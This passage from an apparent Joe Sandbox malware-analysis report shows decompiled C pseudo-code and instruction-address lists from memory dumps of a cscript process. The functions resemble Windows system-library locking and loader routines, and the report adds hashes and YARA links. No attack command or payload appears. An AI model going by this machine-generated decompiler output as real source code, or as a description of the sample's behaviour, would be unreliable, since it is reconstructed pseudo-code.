								return E054FB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x054d4128
0x054d4135
0x054d413c
0x054d4141
0x054d4145
0x054d4147
0x054d414e
0x054d4151
0x054d4159
0x054d415c
0x054d4160
0x054d4164
0x054d4168
0x054d416c
0x054d417f
0x054d4181
0x054d446a
0x054d446a
0x054d418c
0x054d4195
0x054d4199
0x054d4432
0x054d4439
0x054d443d
0x054d4442
0x054d4447
0x00000000
0x054d419f
0x054d41a3
0x054d41b1
0x054d41b9
0x054d41bd
0x054d45db
0x054d45db
0x00000000
0x054d41c3
0x054d41c3
0x054d41ce
0x054d41d4
0x0551e138
0x0551e13e
0x0551e169
0x0551e16d
0x0551e19e
0x0551e16f
0x0551e16f
0x0551e175
0x0551e179
0x0551e18f
0x0551e193
0x00000000
0x0551e199
0x00000000
0x0551e199
0x0551e193
0x00000000
0x00000000
0x00000000
0x054d41da
0x054d41da
0x054d41df
0x054d41e4
0x054d41ec
0x054d4203
0x054d4207
0x0551e1fd
0x054d4222
0x054d4226
0x0551e1f3
0x0551e1f3
0x054d422c
0x054d422c
0x054d4233
0x0551e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x054d4239
0x054d4239
0x054d4239
0x054d4239
0x054d4233
0x054d4226
0x054d41ee
0x054d41ee
0x054d41f4
0x054d4575
0x0551e1b1
0x0551e1b1
0x00000000
0x054d457b
0x054d457b
0x054d4582
0x0551e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x054d4588
0x054d4588
0x054d458c
0x0551e1c4
0x0551e1c4
0x00000000
0x054d4592
0x054d4592
0x054d4599
0x0551e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x054d459f
0x054d459f
0x054d45a3
0x0551e1d7
0x0551e1e4
0x00000000
0x054d45a9
0x054d45a9
0x054d45b0
0x0551e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x054d45b6
0x054d45b6
0x054d45b6
0x00000000
0x054d45b6
0x054d45b0
0x054d45a3
0x054d4599
0x054d458c
0x054d4582
0x00000000
0x00000000
0x00000000
0x00000000
0x054d41f4
0x054d423e
0x054d4241
0x054d45c0
0x054d45c4
0x00000000
0x054d45ca
0x054d45ca
0x00000000
0x0551e207
0x0551e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x054d45d1
0x00000000
0x00000000
0x054d45ca
0x00000000
0x054d4247
0x054d4247
0x054d4247
0x054d4249
0x054d4249
0x054d4249
0x054d4251
0x054d4251
0x054d4257
0x054d425f
0x054d426e
0x054d4270
0x054d427a
0x0551e219
0x0551e219
0x054d4280
0x054d4282
0x054d4456
0x054d45ea
0x00000000
0x054d45f0
0x0551e223
0x00000000
0x0551e223
0x054d445c
0x054d445c
0x00000000
0x054d445c
0x00000000
0x054d4288
0x054d428c
0x0551e298
0x054d4292
0x054d4292
0x054d429e
0x054d42a3
0x054d42a7
0x054d42ac
0x0551e22d
0x054d42b2
0x054d42b2
0x054d42b9
0x054d42bc
0x054d42c2
0x054d42ca
0x054d42cd
0x054d42cd
0x054d42d4
0x054d433f
0x054d433f
0x054d42d6
0x054d42d6
0x054d42d9
0x054d42dd
0x054d42eb
0x0551e23a
0x054d42f1
0x054d4305
0x054d430d
0x054d4315
0x054d4318
0x054d431f
0x054d4322
0x054d432e
0x054d433b
0x054d433b
0x00000000
0x054d432e
0x054d42eb
0x054d434c
0x054d434e
0x054d4352
0x054d4359
0x054d435e
0x054d4361
0x054d436e
0x054d438a
0x054d438e
0x054d4396
0x054d439e
0x054d43a1
0x054d43ad
0x054d43bb
0x054d43bb
0x054d43ad
0x054d436e
0x054d43bf
0x054d43c5
0x054d4463
0x054d4463
0x054d43ce
0x054d43d5
0x054d43d9
0x054d43df
0x054d4475
0x054d4479
0x054d4491
0x054d4491
0x054d4479
0x054d43e5
0x054d43eb
0x054d43f4
0x054d43f6
0x054d43f9
0x054d43fc
0x054d43ff
0x054d44e8
0x054d44ed
0x054d44f3
0x0551e247
0x00000000
0x054d44f9
0x054d4504
0x054d4508
0x054d450f
0x0551e269
0x00000000
0x054d4515
0x054d4519
0x054d4531
0x054d4534
0x054d4537
0x054d453e
0x054d4541
0x054d454a
0x0551e255
0x0551e255
0x0551e25b
0x0551e25e
0x0551e261
0x0551e261
0x054d4555
0x054d4559
0x054d455d
0x0551e26d
0x0551e270
0x0551e274
0x0551e27a
0x0551e27d
0x0551e28e
0x0551e28e
0x054d4563
0x054d4563
0x054d4569
0x054d4569
0x00000000
0x054d455d
0x054d450f
0x00000000
0x054d44f3
0x054d43ff
0x054d4405
0x054d4405
0x054d4405
0x054d42ac
0x054d428c
0x054d4282
0x054d4407
0x054d440d
0x0551e2af
0x0551e2af
0x054d4413
0x054d4413
0x00000000
0x054d41d4
0x00000000
0x054d41c3
0x054d41bd
0x054d4415
0x054d4415
0x054d4416
0x054d4417
0x054d4429
0x054d416e
0x054d416e
0x054d4175
0x054d4498
0x054d449f
0x0551e12d
0x00000000
0x0551e133
0x00000000
0x0551e133
0x054d44a5
0x054d44a5
0x054d44aa
0x00000000
0x054d44bb
0x054d44ca
0x054d44d6
0x054d44d7
0x054d44d8
0x054d44e3
0x054d44e3
0x054d44aa
0x054d417b
0x054d417b
0x054d417b
0x00000000
0x054d417b
0x054d4175
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed9ebf073861235063c028bdd0031812cb35a5b17d092c21518be71aa0587f2
Instruction ID: e734d0592c03aff20953b9b1c3f6e839a2bd6d98bccf84bce3b1348e2c8dfc5c
Opcode Fuzzy Hash: 3ed9ebf073861235063c028bdd0031812cb35a5b17d092c21518be71aa0587f2
Instruction Fuzzy Hash: 11F18E706082118BDB14CF59C4A4ABAFBE2FF88754F04496EF896CB350E774D885CB62

Uniqueness

Uniqueness Score: -1.00%

Function 054E20A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E054E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x55a8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E054E2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E054E2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E054B58EC(_t240);
									_t221 =  *0x55a5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x55a5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E054F4A2C(0x55a6e40, 0x54f4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E054D7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5495c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E054EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E054EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05537016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L054D2400(_t267 + 0x20);
															}
															L054D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E054E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E054D2280(_t134, 0x55a8608);
									__eflags =  *0x55a6e48 - _t253; // 0x36bb0f8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E054CFFB0(_t198, _t241, 0x55a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x55a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x55a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E054E6B90(_t210,  &_v64);
										_t262 =  *0x55a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E054EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E054F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E054F006A(0x55a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x55a8608);
												E054FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x55a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x55a6e48; // 0x36bb0f8
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E054CFFB0(_t198, _t240, 0x55a8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E054F00C2(0x55a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x054e20a0
0x054e20a8
0x054e20ad
0x054e20b3
0x054e20b8
0x054e20c2
0x054e20c7
0x054e20cb
0x054e20d2
0x054e2263
0x054e2266
0x05525836
0x05525836
0x00000000
0x054e226c
0x054e226c
0x054e2270
0x054e2274
0x054e20e2
0x054e20e2
0x054e20e6
0x054e20ee
0x055257dc
0x055257de
0x055257ec
0x055257ec
0x055257f1
0x055257f3
0x055257f8
0x00000000
0x055257f8
0x055257e0
0x055257e4
0x055257ea
0x00000000
0x00000000
0x00000000
0x055257ea
0x054e20f4
0x054e20f4
0x054e20f8
0x054e20f8
0x054e20fc
0x054e2100
0x054e2106
0x054e2201
0x054e2206
0x054e220b
0x054e220e
0x054e22a9
0x054e22ac
0x00000000
0x00000000
0x054e22b2
0x054e22b5
0x05525801
0x05525806
0x00000000
0x00000000
0x05525810
0x05525815
0x05525818
0x00000000
0x00000000
0x0552581e
0x054e22bb
0x054e22bb
0x054e2218
0x054e2218
0x054e221c
0x054e2220
0x054e2222
0x054e22c2
0x054e22c4
0x054e22dc
0x054e22dc
0x054e22e1
0x00000000
0x00000000
0x00000000
0x054e22e7
0x054e22c8
0x054e22cd
0x054e22d3
0x054e22d6
0x05525823
0x05525825
0x05525827
0x00000000
0x00000000
0x0552582d
0x00000000
0x0552582d
0x00000000
0x054e2228
0x054e2228
0x00000000
0x054e2228
0x054e2222
0x054e2214
0x054e2214
0x00000000
0x054e2114
0x054e2114
0x054e2114
0x054e211a
0x054e211c
0x054e2348
0x054e234d
0x05525840
0x05525845
0x05525848
0x0552584e
0x0552584e
0x05525848
0x054e2353
0x054e2355
0x054e2388
0x054e2388
0x054e2368
0x054e236a
0x054e236c
0x054e238f
0x00000000
0x054e236e
0x054e236e
0x054e218e
0x054e218e
0x054e2191
0x054e2195
0x05525a03
0x05525a06
0x05525a0c
0x05525a0f
0x05525a11
0x05525a13
0x05525a13
0x05525a19
0x05525a1f
0x00000000
0x054e219b
0x054e219b
0x054e21a0
0x054e2282
0x054e2284
0x054e2284
0x054e2284
0x054e2284
0x054e21a6
0x054e21a9
0x054e21ac
0x054e21ae
0x054e21b3
0x054e228b
0x054e2290
0x054e2379
0x054e2296
0x054e2298
0x054e2298
0x054e2290
0x054e21b9
0x054e21be
0x054e22a2
0x054e22a2
0x054e21c4
0x054e21c8
0x054e21cc
0x054e21d0
0x054e21d4
0x054e21de
0x054e21e3
0x05525a29
0x05525a2c
0x00000000
0x00000000
0x05525a3b
0x00000000
0x054e21e9
0x054e21e9
0x054e21e9
0x054e21ee
0x054e21f1
0x05525a45
0x05525a4b
0x05525a52
0x05525a58
0x05525a5d
0x05525a5f
0x05525a71
0x05525a61
0x05525a6a
0x05525a6a
0x05525a76
0x05525a79
0x05525a7f
0x05525a83
0x05525a85
0x05525a87
0x05525a87
0x05525a8c
0x05525a91
0x05525a97
0x05525a9f
0x05525aa0
0x05525aa1
0x05525aa6
0x05525aab
0x05525ab1
0x05525ab3
0x05525ab9
0x05525aca
0x05525ad4
0x05525ad4
0x05525ade
0x05525ade
0x05525aab
0x05525a79
0x05525a52
0x054e21f7
0x054e21f9
0x054e21fe
0x054e21fe
0x054e21e3
0x054e2195
0x054e236c
0x054e2122
0x054e2122
0x054e2124
0x054e2231
0x054e2236
0x054e2236
0x054e2238
0x054e2238
0x054e2240
0x054e2242
0x054e2244
0x055259fc
0x054e218c
0x054e218c
0x00000000
0x054e218c
0x054e224a
0x054e224f
0x054e2256
0x054e2304
0x054e2309
0x054e230f
0x054e231e
0x054e231e
0x054e231e
0x054e2320
0x054e2325
0x054e232a
0x054e232c
0x054e233e
0x054e233e
0x00000000
0x054e232c
0x054e2311
0x054e2317
0x054e231a
0x054e231c
0x054e2380
0x054e2380
0x054e2380
0x054e2384
0x00000000
0x00000000
0x054e2386
0x00000000
0x054e231c
0x054e225c
0x054e225c
0x00000000
0x054e225c
0x054e212a
0x054e2134
0x054e2138
0x054e213d
0x05525858
0x05525863
0x05525863
0x05525867
0x0552586a
0x00000000
0x00000000
0x0552586c
0x0552586c
0x05525871
0x05525875
0x05525877
0x05525997
0x0552599c
0x055259a1
0x055259a7
0x055259a7
0x00000000
0x055259a7
0x0552587d
0x00000000
0x0552588b
0x0552588b
0x05525890
0x05525892
0x05525894
0x05525899
0x0552589b
0x055258a0
0x055258a0
0x055258aa
0x055258b2
0x055258b6
0x055258be
0x055258c6
0x055258c9
0x0552590d
0x05525917
0x0552591a
0x0552591c
0x05525920
0x05525928
0x0552592a
0x0552592c
0x0552592e
0x0552592e
0x055258cb
0x055258cd
0x055258d8
0x055258e0
0x055258f4
0x055258fe
0x055258fe
0x0552593a
0x0552593e
0x05525940
0x05525942
0x00000000
0x05525944
0x05525944
0x05525949
0x0552594e
0x0552594e
0x05525953
0x0552595b
0x05525976
0x05525976
0x0552597a
0x0552597f
0x00000000
0x00000000
0x00000000
0x00000000
0x05525981
0x05525981
0x05525981
0x05525983
0x05525988
0x0552598d
0x05525991
0x05525991
0x00000000
0x0552595d
0x0552595d
0x05525963
0x05525965
0x00000000
0x00000000
0x00000000
0x00000000
0x05525967
0x05525967
0x0552596b
0x0552596d
0x00000000
0x00000000
0x0552596f
0x05525971
0x05525971
0x05525974
0x00000000
0x00000000
0x00000000
0x05525974
0x00000000
0x05525967
0x0552595b
0x05525942
0x05525863
0x054e2143
0x054e2143
0x054e2149
0x054e214f
0x054e22ec
0x054e22f1
0x054e22f6
0x00000000
0x054e22f6
0x054e2159
0x054e2173
0x054e2173
0x054e217d
0x054e2181
0x054e2186
0x055259ae
0x055259b2
0x055259b5
0x055259b7
0x055259ba
0x055259cd
0x055259d1
0x055259d5
0x055259d9
0x055259db
0x00000000
0x00000000
0x055259dd
0x055259dd
0x055259e1
0x055259e4
0x055259e7
0x055259ee
0x055259ee
0x055259f3
0x055259f3
0x00000000
0x054e2186
0x054e2164
0x054e216d
0x00000000
0x00000000
0x00000000
0x054e216d
0x054e2106
0x054e2266
0x054e20d8
0x054e20da
0x054e20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e81b256b936ec19cc51b5fe5bfa149f4ea9d0bf80af5a03a7d7aa98caaec0ba
Instruction ID: 2d42e92d748c1a1ef2887d1d2258b394a64393f2087244000e1f50d828c5ad38
Opcode Fuzzy Hash: 2e81b256b936ec19cc51b5fe5bfa149f4ea9d0bf80af5a03a7d7aa98caaec0ba
Instruction Fuzzy Hash: 2BF10635A0C3519FD725CF28C844BABB7EABF85311F08855EE9959B380E7B4D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 054CD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E054CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x55ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E054C6600(0x55a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x55a7b9c; // 0x0
							_t281 = L054D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E054FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x55a7b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x55a7b8c; // 0x36b29c0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x36b2a70
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E054D2280(_t200, 0x55a84d8);
									_t277 =  *0x55a85f4; // 0x36b2eb0
									_t351 =  *0x55a85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75130000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
